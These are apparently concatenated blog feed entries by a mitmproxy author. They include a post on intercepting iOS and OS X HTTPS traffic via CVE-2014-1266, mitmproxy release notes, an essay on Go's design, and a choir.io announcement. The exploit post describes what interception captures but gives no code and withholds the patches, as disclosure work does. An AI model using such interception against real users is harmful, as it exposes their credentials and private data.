So, stockpile your IOS 7.0.6 devices now, and intercept all the things.</p> Exploiting CVE-2014-1266 with mitmproxy 2014-02-25T00:00:00+00:00 2014-02-25T00:00:00+00:00 https://corte.si/posts/security/cve-2014-1266/ <p>This post is a quick recap of work I've been discussing on Twitter in the last few hours. I've just finished putting together a version of <a rel="external" href="http://mitmproxy.org">mitmproxy</a> that takes advantage of <a rel="external" href="http://support.apple.com/kb/HT6147">CVE-2014-1266</a>, Apple's <a rel="external" href="https://www.imperialviolet.org/2014/02/22/applebug.html">critical SSL/TLS bug</a>. We knew in theory that the issue should give access to all SSL traffic using Apple's broken implementation - I can now report that this is also true in practice.</p> <p>I've confirmed full transparent interception of HTTPS traffic on both IOS (prior to 7.0.6) and OSX Mavericks. Nearly all encrypted traffic, including usernames, passwords, and even Apple app updates can be captured. This includes:</p> <ul> <li>App store and software update traffic</li> <li>iCloud data, including KeyChain enrollment and updates</li> <li>Data from the Calendar and Reminders</li> <li>Find My Mac updates</li> <li>Traffic for applications that use certificate pinning, like Twitter</li> </ul> <p>It's difficult to over-state the seriousness of this issue. With a tool like mitmproxy in the right position, an attacker can intercept, view and modify nearly all sensitive traffic. This extends to the software update mechanism itself, which uses HTTPS for deployment.</p> <p>At the time of writing, Apple still doesn't have a fix deployed for OSX. It took less than a day to get the patched version of mitmproxy and its supporting libraries up and running. I won't be releasing my patches until well after Apple's pending update, but it's safe to assume that this is now being exploited in the wild. 
Of course, intelligence agencies have no doubt been on top of this for some time - perhaps some of the <a rel="external" href="http://news.yahoo.com/security-expert-calls-nbc-whiny-report-sochi-olympics-003047841.html">inflammatory Sochi security horror stories</a> were plausible after all.</p> mitmproxy and pathod 0.10 2014-01-29T00:00:00+00:00 2014-01-29T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce_0_10/ <div class="media"> <a href="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png"> <img src="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png" /> </a> </div> <p>I've just released v0.10 of both <a rel="external" href="http://mitmproxy.org">mitmproxy</a> and <a rel="external" href="http://pathod.org">pathod</a>. This is chiefly a bugfix release, with a few nice additional features to sweeten the pot.</p> <div class="media"> <a href="mitmproxy-webapp.png"> <img src="mitmproxy-webapp.png" /> </a> </div> <p>Perhaps the most visible change has been a huge improvement in the recommended method for installing the mitmproxy certificates. Certs are now served straight from the web application hosted in mitmproxy, which means that in most cases cert installation is as simple as typing the mitmproxy URL into the device's browser. <a rel="external" href="http://mitmproxy.org/doc/certinstall/webapp.html">See the docs</a> for more.</p> <p>In other, minor news - I see that the <a rel="external" href="https://github.com/mitmproxy/mitmproxy">mitmproxy project</a> has just passed 2000 stars on GitHub. Between PyPI and the files we serve from <a rel="external" href="http://mitmproxy.org">mitmproxy.org</a>, the project has also seen nearly 100k downloads in the last year (after removing obvious bots). 
I know, I know - figures like these don't mean much, but it's still nice to see that people are using and enjoying mitmproxy.</p> <h2 id="changelog">Changelog</h2> <ul> <li>Support for multiple scripts and multiple script arguments</li> <li>Easy certificate install through the in-proxy web app, which is now enabled by default</li> <li><a rel="external" href="http://mitmproxy.org/doc/features/forwardproxy.html">Forward proxy mode</a>, that forwards proxy requests to an upstream HTTP server</li> <li>Reverse proxy now works with SSL</li> <li>Search within a request/response using the "/" and "n" shortcut keys</li> <li>A view that beautifies CSS files if cssutils is available</li> <li>Many bug fixes, documentation improvements, and more.</li> </ul> How I Learned to Stop Worrying and Love Golang 2013-11-21T00:00:00+00:00 2013-11-21T00:00:00+00:00 https://corte.si/posts/code/go/golang-practicaly-beats-purity/ <p>Here's a riff on Malcolm Gladwell's <a rel="external" href="http://en.wikipedia.org/wiki/Outliers_(book)">rule of thumb about mastery</a>: you don't really know a programming language until you've written 10,000 lines of production-quality code in it. Like the original, this is a generalization that is undoubtedly false in many cases - still, it broadly matches my intuition for most languages and most programmers<sup class="footnote-reference"><a href="#3">1</a></sup>. At the beginning of this year, I wrote <a href="https://corte.si/posts/code/go/go-rant/">a sniffy post about Go</a> when I was about 20% of the way to knowing the language by this measure. Today's post is an update from further along the curve - about 80% - following a recent set of adventures that included entirely rewriting <a rel="external" href="http://choir.io">choir.io</a>'s core dispatcher in Go. My opinion of Go has changed significantly in the meantime. Despite my initial exasperation, I found that the experience of actually writing Go was not unpleasant. 
The shallow issues became less annoying over time (perhaps just due to habituation), and the deep issues turned out to be less problematic in practice than in theory. Most of all, though, I found Go was just a fun and productive language to work in. Go has colonized more and more use cases for me, to the point where it is now seriously eroding my use of both Python and C.</p> <p>After my rather slow Road to Damascus experience, I noticed something odd: I found it difficult to explain why Go worked so well in practice. Sure, Go has a triad of really smashing ideas (interfaces, channels and goroutines), but my list of warts and annoyances is long enough that it's not clear on paper that the upsides outweigh the downsides. So, my experience of actually cutting code in Go was at odds with my rational analysis of the language, which bugged me. I've thought about this a lot over the last few months, and eventually came up with an explanation that sounds like nonsense at first sight: Go's weaknesses are also its strengths. In particular, many design choices that seem to reduce coherence and maintainability at first sight actually combine to give the language a practical character that's very usable and compelling. Let's see if I can convince you that this isn't as crazy as it sounds.</p> <h2 id="maps-and-magic">Maps and magic</h2> <p>Let's pretend that we're the designers of Go, and see if we can follow the thinking that went into a seemingly simple part of the language - the value retrieval syntax for maps. 
We begin with the simplest possible case - direct, obvious, and familiar from a number of other languages:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span>v</span><span style="color: #D73A49;"> :=</span><span> mymap[</span><span style="color: #032F62;">&quot;foo&quot;</span><span>]</span></span></code></pre> <p>It would be nice if we could keep it this simple, but there's a complication - what if "foo" doesn't exist in the map? The fact that Go doesn't have exceptions limits the possibilities. We can discard some gross options out of hand - for instance, making this a runtime error or returning a magic value flagging non-existence are both pretty horrible. A more plausible route is to pass an existence flag back as a second return value:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span>v, ok</span><span style="color: #D73A49;"> :=</span><span> mymap[</span><span style="color: #032F62;">&quot;foo&quot;</span><span>]</span></span></code></pre> <p>So far, so logical, and if consistency were the primary goal, we would stop here. However, having two return arguments would make many common patterns of use inconvenient. You would constantly be discarding the <strong>ok</strong> flag in situations where it wasn't needed. Another repercussion is that you couldn't directly use the results in an <strong>if</strong> clause. Instead of a clean phrasing like this (relying on the zero value returned by default):</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">if</span><span> mymap[</span><span style="color: #032F62;">&quot;foo&quot;</span><span>] {</span></span> <span class="giallo-l"><span style="color: #6A737D;"> // Do something</span></span> <span class="giallo-l"><span>}</span></span></code></pre> <p>... 
you would have to do this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">if</span><span> _, ok</span><span style="color: #D73A49;"> :=</span><span> mymap[</span><span style="color: #032F62;">&quot;foo&quot;</span><span>]; ok {</span></span> <span class="giallo-l"><span style="color: #6A737D;"> // Do something</span></span> <span class="giallo-l"><span>}</span></span></code></pre> <p>Ugh. What we really want is to get the best of both worlds: the ease of the first signature, plus the flexibility of the second. In fact, Go does exactly that, in a surprising way: it discards some basic conceptual constraints, and makes the data returned by the map accessor depend on how many variables it's assigned to. When it's assigned to one variable, it just returns the value. When it's assigned to two variables, it also returns an existence flag.</p> <p>Compare this with Python. The dictionary access syntax is identical:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span>v</span><span style="color: #D73A49;"> =</span><span> mymap[</span><span style="color: #032F62;">&quot;foo&quot;</span><span>]</span></span></code></pre> <p>Python does have exceptions, so non-existence is signaled through a <strong>KeyError</strong>, and the dictionary interface includes a <strong>get</strong> method that allows the user to specify a default return when this is too cumbersome. This is certainly consistent on the surface, but there's also a deeper structure that helps the user understand what's going on. 
The square bracket accessor syntax is just syntactic sugar, because the call above is equivalent to this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span>v</span><span style="color: #D73A49;"> =</span><span> mymap.</span><span style="color: #005CC5;">__getitem__</span><span>(</span><span style="color: #032F62;">&quot;foo&quot;</span><span>)</span></span></code></pre> <p>In a sense, then, the value access is just a method call. The coder can write a dictionary of their own that acts just like a built-in dictionary<sup class="footnote-reference"><a href="#2">2</a></sup>, and can also build a clear mental model of what's going on underneath. Python dictionaries are conceptually built <em>up</em> from more primitive language elements, where Go maps are designed <em>down</em> from concrete use cases.</p> <h2 id="range-a-compendium-of-use-cases">Range: a compendium of use cases</h2> <p>An even stranger beast is the <strong>range</strong> clause of Go's for loops. Like map accessors, <strong>range</strong> will return either one value or two, depending on the number of variables assigned to. What's particularly revealing about <strong>range</strong> is the way these results differ depending on the data type being ranged over. 
Consider this piece of code, for example:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">for</span><span> x, y</span><span style="color: #D73A49;"> := range</span><span> v {</span></span> <span class="giallo-l"><span>}</span></span></code></pre> <p>To figure out what this does, we need to know the type of <strong>v</strong>, and then consult a table like this:<sup class="footnote-reference"><a href="#1">3</a></sup></p> <table class="table table-bordered"> <tr> <th>Range expression</th> <th>1st Value</th> <th>2nd Value</th> </tr> <tr> <td>array or slice</td> <td>index i</td> <td>a[i]</td> </tr> <tr> <td>map</td> <td>key k</td> <td>m[k]</td> </tr> <tr> <td>string</td> <td>index i of rune</td> <td>rune int</td> </tr> <tr> <td>channel</td> <td>element</td> <td>error</td> </tr> </table> <p>What range does for arrays and maps seems consistent and not particularly surprising. Things get slightly odd with channels. A second variable arguably doesn't make much sense when ranging over a channel, so trying to do this results in a compile time error. Not terribly consistent, but logical.</p> <p>Weirder still is <strong>range</strong> over strings. When operating on a string, range returns <a rel="external" href="http://golang.org/ref/spec#Constants">runes</a> (Unicode code points) not bytes. 
So, this code:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span>s</span><span style="color: #D73A49;"> :=</span><span style="color: #032F62;"> &quot;a</span><span style="color: #005CC5;">\u00fc</span><span style="color: #032F62;">b&quot;</span></span> <span class="giallo-l"><span style="color: #D73A49;">for</span><span> a, b</span><span style="color: #D73A49;"> := range</span><span> s {</span></span> <span class="giallo-l"><span> fmt.</span><span style="color: #6F42C1;">Println</span><span>(a, b)</span></span> <span class="giallo-l"><span>}</span></span></code></pre> <p>Prints this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>0 97</span></span> <span class="giallo-l"><span>1 252</span></span> <span class="giallo-l"><span>3 98</span></span></code></pre> <p>Notice the jump from 1 to 3 in the index, because the rune at offset 1 is two bytes wide in UTF-8. And look what happens when we now retrieve the value at that offset from the string. This:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span>fmt.</span><span style="color: #6F42C1;">Println</span><span>(s[</span><span style="color: #005CC5;">1</span><span>])</span></span></code></pre> <p>Prints this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>195</span></span></code></pre> <p>What gives? At first glance, it's reasonable to expect this to print 252, as returned by <strong>range</strong>. That's wrong, though, because string access by index operates on bytes, so what we're given is the first byte of the UTF-8 encoding of the rune. This is bound to cause subtle bugs. 
Code that works perfectly on ASCII text simply due to the fact that UTF-8 encodes these in a single byte will fail mysteriously as soon as non-ASCII characters appear.</p> <p>My argument here is that <strong>range</strong> is a very clear example of design directly from concrete use cases down, with little concern for consistency. In fact, the table of <strong>range</strong> return values above is really just a compendium of use cases: at each point the result is simply the one that is most directly useful. So, it makes total sense that ranging over strings returns runes. In fact, doing anything else would arguably be incorrect. What's characteristic here is that no attempt was made to reconcile this interface with the core of the language. It serves the use case well, but feels jarring.</p> <h2 id="arrays-are-values-maps-are-references">Arrays are values, maps are references</h2> <p>One final example along these lines. A core irregularity at the heart of Go is that arrays are values, while maps are references. 
So, this code will modify the <strong>s</strong> variable:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">func</span><span style="color: #6F42C1;"> mod</span><span>(</span><span style="color: #E36209;">x</span><span style="color: #D73A49;"> map</span><span>[</span><span style="color: #D73A49;">int</span><span>]</span><span style="color: #D73A49;"> int</span><span>){</span></span> <span class="giallo-l"><span> x[</span><span style="color: #005CC5;">0</span><span>]</span><span style="color: #D73A49;"> =</span><span style="color: #005CC5;"> 2</span></span> <span class="giallo-l"><span>}</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;">func</span><span style="color: #6F42C1;"> main</span><span>() {</span></span> <span class="giallo-l"><span> s</span><span style="color: #D73A49;"> := map</span><span>[</span><span style="color: #D73A49;">int</span><span>]</span><span style="color: #D73A49;">int</span><span>{}</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> mod</span><span>(s)</span></span> <span class="giallo-l"><span> fmt.</span><span style="color: #6F42C1;">Println</span><span>(s)</span></span> <span class="giallo-l"><span>}</span></span></code></pre> <p>And print:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>map[0:2]</span></span></code></pre> <p>While this code won't:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">func</span><span style="color: #6F42C1;"> mod</span><span>(</span><span style="color: #E36209;">x</span><span> [</span><span style="color: #005CC5;">1</span><span>]</span><span style="color: #D73A49;">int</span><span>){</span></span> <span class="giallo-l"><span> x[</span><span style="color: 
#005CC5;">0</span><span>]</span><span style="color: #D73A49;"> =</span><span style="color: #005CC5;"> 2</span></span> <span class="giallo-l"><span>}</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;">func</span><span style="color: #6F42C1;"> main</span><span>() {</span></span> <span class="giallo-l"><span> s</span><span style="color: #D73A49;"> :=</span><span> [</span><span style="color: #005CC5;">1</span><span>]</span><span style="color: #D73A49;">int</span><span>{}</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> mod</span><span>(s)</span></span> <span class="giallo-l"><span> fmt.</span><span style="color: #6F42C1;">Println</span><span>(s)</span></span> <span class="giallo-l"><span>}</span></span></code></pre> <p>And will print:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>[0]</span></span></code></pre> <p>This is undoubtedly inconsistent, but it turns out not to be an issue in practice, mostly because slices <em>are</em> references, and are passed around much more frequently than arrays. This issue has surprised enough people to make it into the Go FAQ, <a rel="external" href="http://golang.org/doc/faq#references">where the justification is as follows</a>:</p> <blockquote> <p>There's a lot of history on that topic. Early on, maps and channels were syntactically pointers and it was impossible to declare or use a non-pointer instance. Also, we struggled with how arrays should work. Eventually we decided that the strict separation of pointers and values made the language harder to use. 
This change added some regrettable complexity to the language but had a large effect on usability: Go became a more productive, comfortable language when it was introduced.</p> </blockquote> <p>This is not exactly the clearest explanation for a technical decision I've ever read, so allow me to paraphrase: "Things evolved this way for pragmatic reasons, and consistency was never important enough to force a reconciliation".</p> <h2 id="the-g-word">The G Word</h2> <p>Now we get to that perpetual bugbear of Go critiques: the lack of generics. This, I think, is the deepest example of the Go designers' willingness to sacrifice coherence for pragmatism. One gets the feeling that the Go devs are a tad weary of this argument by now, but the issue is substantive and worth facing squarely. The crux of the matter is this: Go's built-in container types are super special. They can be parameterized with the type of their contained values in a way that user-written data structures can't be.</p> <p>The supported way to do generic data structures is to use blank interfaces. Let's look at an example of how this works in practice. First, here is a simple use of the built-in slice type.</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span>l</span><span style="color: #D73A49;"> :=</span><span style="color: #6F42C1;"> make</span><span>([]</span><span style="color: #D73A49;">string</span><span>,</span><span style="color: #005CC5;"> 1</span><span>)</span></span> <span class="giallo-l"><span>l[</span><span style="color: #005CC5;">0</span><span>]</span><span style="color: #D73A49;"> =</span><span style="color: #032F62;"> &quot;foo&quot;</span></span> <span class="giallo-l"><span>str</span><span style="color: #D73A49;"> :=</span><span> l[</span><span style="color: #005CC5;">0</span><span>]</span></span></code></pre> <p>In the first line we initialize the slice with the element type <strong>string</strong>. 
We then insert a value, and in the final line, we retrieve it. At this point, <strong>str</strong> has type <strong>string</strong> and is ready to use. The user-written analogue of this might be a modest data structure with <strong>put</strong> and <strong>get</strong> methods. We can define this using interfaces like so:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">type</span><span style="color: #6F42C1;"> gtype</span><span style="color: #D73A49;"> struct</span><span> {</span></span> <span class="giallo-l"><span> data</span><span style="color: #D73A49;"> interface</span><span>{}</span></span> <span class="giallo-l"><span>}</span></span> <span class="giallo-l"><span style="color: #D73A49;">func</span><span> (</span><span style="color: #E36209;">t </span><span style="color: #D73A49;">*</span><span style="color: #6F42C1;">gtype</span><span>)</span><span style="color: #6F42C1;"> put</span><span>(</span><span style="color: #E36209;">v</span><span style="color: #D73A49;"> interface</span><span>{}) {</span></span> <span class="giallo-l"><span> t.data</span><span style="color: #D73A49;"> =</span><span> v</span></span> <span class="giallo-l"><span>}</span></span> <span class="giallo-l"><span style="color: #D73A49;">func</span><span> (</span><span style="color: #E36209;">t </span><span style="color: #D73A49;">*</span><span style="color: #6F42C1;">gtype</span><span>)</span><span style="color: #6F42C1;"> get</span><span>()</span><span style="color: #D73A49;"> interface</span><span>{} {</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span> t.data</span></span> <span class="giallo-l"><span>}</span></span></code></pre> <p>To use this structure, we would say:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span>v</span><span style="color: #D73A49;"> :=</span><span 
style="color: #6F42C1;"> gtype</span><span>{}</span></span> <span class="giallo-l"><span>v.</span><span style="color: #6F42C1;">put</span><span>(</span><span style="color: #032F62;">&quot;foo&quot;</span><span>)</span></span> <span class="giallo-l"><span>str</span><span style="color: #D73A49;"> :=</span><span> v.</span><span style="color: #6F42C1;">get</span><span>().(</span><span style="color: #D73A49;">string</span><span>)</span></span></code></pre> <p>We can assign a string to a variable with the empty interface type without doing anything special, so <strong>put</strong> is simple. However, we need to use a type assertion on the way out; otherwise the <strong>str</strong> variable will have type <strong>interface{}</strong>, which is probably not what we want.</p> <p>There are a number of issues here. It's cosmetically bothersome that we have to place the burden of type assertion on the caller of our data structure, making the interface just a little bit less nice to use. But the problems extend beyond syntactic inconvenience - there's a substantive difference between these two ways of doing things. Trying to insert a value of the wrong type into the built-in slice causes a compile-time error, but the type assertion acts at run-time and causes a panic on failure. The blank-interface paradigm sidesteps Go's compile-time type checking, negating any benefit we may have received from it.</p> <p>The biggest issue for me, though, is the conceptual inconsistency. This is something that's difficult to put into words, so here's a picture:</p> <div class="media"> <a href="inconsistency.jpg"> <img src="inconsistency.jpg" /> </a> </div> <p>The fact that the built-in containers magically do useful things that user-written code can't irks me. It hasn't become less jarring over time, and still feels like a bit of grit in my eye that I can't get rid of. 
I might be an extreme case, but this is an aesthetic instinct that I think is shared by many programmers, and would have convinced many language designers to approach the problem differently.</p> <p>The extent to which Go's lack of generics is a critical problem, however, is not the point here. The meat of the matter is <strong>why</strong> this design decision was taken, and what it reveals about the character of Go. Here's how the lack of generics is <a rel="external" href="http://blog.golang.org/go-at-io-frequently-asked-questions">justified by the Go developers</a>:</p> <blockquote> <p>Many proposals for generics-like features have been mooted both publicly and internally, but as yet we haven't found a proposal that is consistent with the rest of the language. We think that one of Go's key strengths is its simplicity, so we are wary of introducing new features that might make the language more difficult to understand.</p> </blockquote> <p>Instead of creating the atomic elements needed to support generic data structures and then adding a suite of them to the standard library, the Go team went the other way. There was a concrete use case for good data structures, and so they were added. Attempting a deep reconciliation with the rest of the language was a secondary requirement that was so unimportant that it fell by the wayside for Go 1.x.</p> <h1 id="a-pragmatic-beauty">A Pragmatic Beauty</h1> <p>Let's over-simplify for a moment and divide languages into two extreme camps. On the one hand, you have languages that are highly consistent, with most higher-order functionality deriving from the atomic elements of the language. In this camp, we can find languages like Lisp. On the other hand are languages that are shamelessly eager to please. They tend to grow organically, sprouting syntax as needed to solve specific pragmatic problems. 
As a consequence, they tend to be large, syntactically diverse, not terribly coherent, and, occasionally, even <a rel="external" href="http://www.perlmonks.org/?node_id=663393">unparseable</a>. In this camp, we find languages like Perl. It's tempting to think that there exists a language somewhere in the infinite multiverse of possibilities that unites perfect consistency and perfect usability, but if there is, we haven't found it. The reality is that all languages are a compromise, and that balancing these two forces against each other is really what makes language design so hard. Placing too much value on consistency constrains the human concessions we can make for mundane use cases. Making too many concessions results in a language that lacks coherence.</p> <p>Like many programmers, I instinctively prefer purity and consistency and distrust "magic". In fact, I've never found a language with a strongly pragmatic bent that I really liked. Until now, that is. Because there's one thing I'm pretty clear on: Go is on the Perl end of this language design spectrum. It's designed firmly from concrete use cases down, and shows its willingness to sacrifice consistency for practicality again and again. The effects of this design philosophy permeate the language. This, then, is the source of my initial dissatisfaction with Go: I'm predisposed to dislike many of its core design decisions.</p> <p>Why, then, has the language grown on me over time? Well, I've gradually become convinced that practically-motivated flaws like the ones I list in this post add up to create Go's unexpected nimbleness. There's a weird sort of alchemy going on here, because I think any one of these decisions in isolation makes Go a worse language (even if only slightly). Together, however, they jolt Go out of a local maximum many procedural languages are stuck in, and take it somewhere better. 
Look again at each of the cases above, and imagine what the cumulative effect on Go would have been if the consistent choice had been made each time. The language would have had more syntax and more core concepts to deal with, and would have been more verbose to write. Once you reason through the repercussions, you find that the result would have been a worse language overall. It's clear that Go is not the way it is because its designers didn't know better, or didn't care. Go is the result of a conscious pragmatism that is deep and audacious. Starting with this philosophy, but still managing to keep the language small and taut, with almost nothing dispensable or extraneous, took great discipline and insight, and is a remarkable achievement.</p> <p>So, despite its flaws, Go remains graceful. It just took me a while to appreciate it, because I expected the grace of a ballet dancer, but found the grace of a battered but experienced bar-room brawler.</p> <p>--</p> <p>Edited to remove some inaccuracies about channels.</p> <div class="footnote-definition" id="1"><sup class="footnote-definition-label">3</sup> <p>Simplified from <a rel="external" href="https://code.google.com/p/go-wiki/wiki/Range">here</a>.</p> </div> <div class="footnote-definition" id="2"><sup class="footnote-definition-label">2</sup> <p>I don't mean mundane details like the syntax and core concepts of a language. 
In the case of Go, you can get a handle on these in an hour by reading the language specification.</p> </div> <div class="footnote-definition" id="3"><sup class="footnote-definition-label">1</sup> <p>Pedant hedge: yes, the illusion isn't perfect, and there are in fact subtle ways in which Python dictionaries are not just objects like any other.</p> </div> mitmproxy and pathod 0.9.2 2013-08-25T00:00:00+00:00 2013-08-25T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce0_9_2/ <div class="media"> <a href="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png"> <img src="..&#x2F;announce0_9_1&#x2F;mitmproxy_0_9_1.png" /> </a> </div> <p>I've just released v0.9.2 of both <a rel="external" href="http://mitmproxy.org">mitmproxy</a> and <a rel="external" href="http://pathod.org">pathod</a>. This is a bugfix release, chiefly to address two crashing issues affecting mitmproxy when relaying SSL traffic. A range of other fixes and improvements are also included - if you use mitmproxy, you should upgrade.</p> <h2 id="changelog">CHANGELOG</h2> <ul> <li>Improvements to the mitmproxywrapper.py helper script for OSX.</li> <li>Don't take minor version into account when checking for serialized file compatibility.</li> <li>Fix a bug causing resource exhaustion under some circumstances for SSL connections.</li> <li>Revamp the way we store interception certificates. We used to store these on disk, they're now in-memory. 
This fixes a race condition related to cert handling, and improves compatibility with Windows, where the rules governing permitted file names are weird, resulting in errors for some valid IDNA-encoded names.</li> <li>Display transfer rates for responses in the flow list.</li> <li>Many other small bugfixes and improvements.</li> </ul> Introducing choir.io 2013-08-16T00:00:00+00:00 2013-08-16T00:00:00+00:00 https://corte.si/posts/choir/intro/ <div class="media"> <a href="choir.png"> <img src="choir.png" /> </a> <div class="subtitle"> choir.io </div> </div> <p>Today, I'm raising the veil (slightly) on a new project - <a rel="external" href="https://choir.io">choir.io</a>. The most succinct description of choir.io is that it is a service that turns events into sound. Why would you want to do that? Well, I believe that there are compelling reasons to make sound part of your monitoring stack. Let's see if I can convince you.</p> <h2 id="the-soundscape">The soundscape</h2> <p>When I walk into my study every morning, I'm surrounded by a rich, subtle soundscape that exists just beneath conscious perception. My air-conditioner, computers and monitors all emit hums and purrs. I can "tune in" to these if I focus, but they usually only draw my attention when something changes. When the power goes out there is a deathly silence; when a CPU fan's noise changes pitch or texture, it bothers me immediately.</p> <p>Layered over this background are more obtrusive sounds, closer to the threshold of awareness - the clacking of keyboards, faint noises of my family getting ready for their day upstairs, the front door opening and closing. Whether or not I pay attention to these is somewhat context-dependent. Am I waiting, for instance, for my wife and kids to start trooping down the stairs so I can join them for my son's swimming lesson? If I am, I listen out for those sounds specifically. 
I get an enormous amount of information about my world from these more discrete, event-related noises.</p> <p>Finally, there are the really obtrusive sounds, things that immediately get my attention. This might be someone saying my name, my phone ringing, a knock at the door, or a smoke alarm. I'm very aware of these, and they usually signal something I have to deal with immediately.</p> <p>These layers of more and less obtrusive sounds form a soundscape that is ever-present, and utterly necessary in our day-to-day lives. Notice how effortless this process of extracting meaning from our ambient sounds is. Our minds process this information stream without any mental exertion, filter out what we don't need to notice, and draw our attention to what we do. There's a lot of cognitive research (that I might delve into in future posts) that shows that our brains and auditory systems are specifically designed to make sense of the world in this way.</p> <p>We have nothing like this rich texture of ambient awareness for the technology that surrounds us. Our monitoring mechanisms seem to be stuck at the ends of the intrusiveness spectrum. At one end, we have email notifications that demand our attention until we start to ignore them or silence them with a filter. At the other end we have passive status dashboards that require us to remember to switch context and visually consult a different interface. Choir.io doesn't aim to supplant either of these, but tries to fill in the blank portion of the awareness spectrum between them.</p> <p>When I sit at my desk, I can hear our server architecture humming away. There's the subtle pitter-patter of hits to various webservers, the occasional clack of an SSH login. Occasionally there is a chime when @alexdong pushes to Github, followed shortly by the celebratory cheer of a server deploy. When I hear the jarring note of a 500 server error, I switch context to view logs or a dashboard, but otherwise my focus stays with my editor window. 
Choir is young, but it's already become an indispensable part of my life.</p> <h2 id="challenges-and-next-steps">Challenges and next steps</h2> <p>There are a number of key questions that we'd like to answer with the help of our intrepid early adopters. First among these is the question of soundscape design. What makes a good sound pack? What is the right mix of intrusive and non-intrusive sounds? How do we construct soundscapes that blend into the background like natural sounds do? Another set of questions surrounds the API and integration. What is the right blend of simplicity and power in the API? Which services should we integrate with next?</p> <p>There are some obvious next steps in the works. We recognize that sound pack design is a deep problem with subjective solutions. So, letting users assemble, edit and eventually share their own sound packs is high on our list of priorities. Free-standing Choir.io player apps for Windows and OSX will also be on the way soon, so you won't need to remember to keep a browser tab open. Technical improvements to the API that are on the way include UDP and SSL support.</p> <p>Choir is trying to do something new, and we want as much feedback as early in the process as possible. So, we've decided to start sending out invites today, even though Choir is far from the polished system that it will be in a few months. If you're brave, willing to give frank feedback, and want to help us explore this exciting idea, please <a rel="external" href="https://choir.io">request an invite</a>.</p> mitmproxy 0.9.1 2013-06-16T00:00:00+00:00 2013-06-16T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce0_9_1/ <div class="media"> <a href="mitmproxy_0_9_1.png"> <img src="mitmproxy_0_9_1.png" /> </a> </div> <p>I'm happy to announce the release of <a rel="external" href="http://mitmproxy.org">mitmproxy 0.9.1</a>. 
This is a bugfix release, with no significant changes in behaviour.</p> <p>As hinted in my previous release note, the project itself is also evolving. As of this release, mitmproxy and its sister projects (<a rel="external" href="http://pathod.net">pathod</a> and <a rel="external" href="https://github.com/mitmproxy/netlib">netlib</a>) are housed under a separate organization on Github, rather than in my own personal space:</p> <p><a class="btn" href="https://github.com/mitmproxy">github.com/mitmproxy</a></p> <p>I'm also very happy to welcome the first external core developer to the mitmproxy project: <a rel="external" href="http://maximilianhils.com/">Maximilian Hils</a>. Max is the author of <a rel="external" href="http://honeyproxy.org/">HoneyProxy</a>, a web analysis front-end for mitmproxy. In the next few months, he'll be working on integrating and expanding his work to become mitmproxy's official web interface. Max's efforts will be sponsored by Google under their <a rel="external" href="http://www.google-melange.com/gsoc/homepage/google/gsoc2013">Summer of Code</a> program, and will be mentored by the <a rel="external" href="http://www.honeynet.org/">HoneyNet Project</a>.</p> <h2 id="changelog">Changelog</h2> <ul> <li>Use "correct" case for Content-Type headers added by mitmproxy.</li> <li>Make UTF environment detection more robust.</li> <li>Improved MIME-type detection for viewers.</li> <li>Always read files in binary mode (Windows compatibility fix).</li> <li>Correct PyOpenSSL dependency declaration.</li> <li>Some developer documentation.</li> </ul> Skout: a devastating privacy vulnerability 2013-05-31T00:00:00+00:00 2013-05-31T00:00:00+00:00 https://corte.si/posts/security/skout/ <p>I've become a bit weary of the process of public vulnerability disclosure - I'm much more likely nowadays to just drop companies an anonymous notice and move on. Every so often, though, I come across an issue so egregious that talking about it publicly seems like an imperative. 
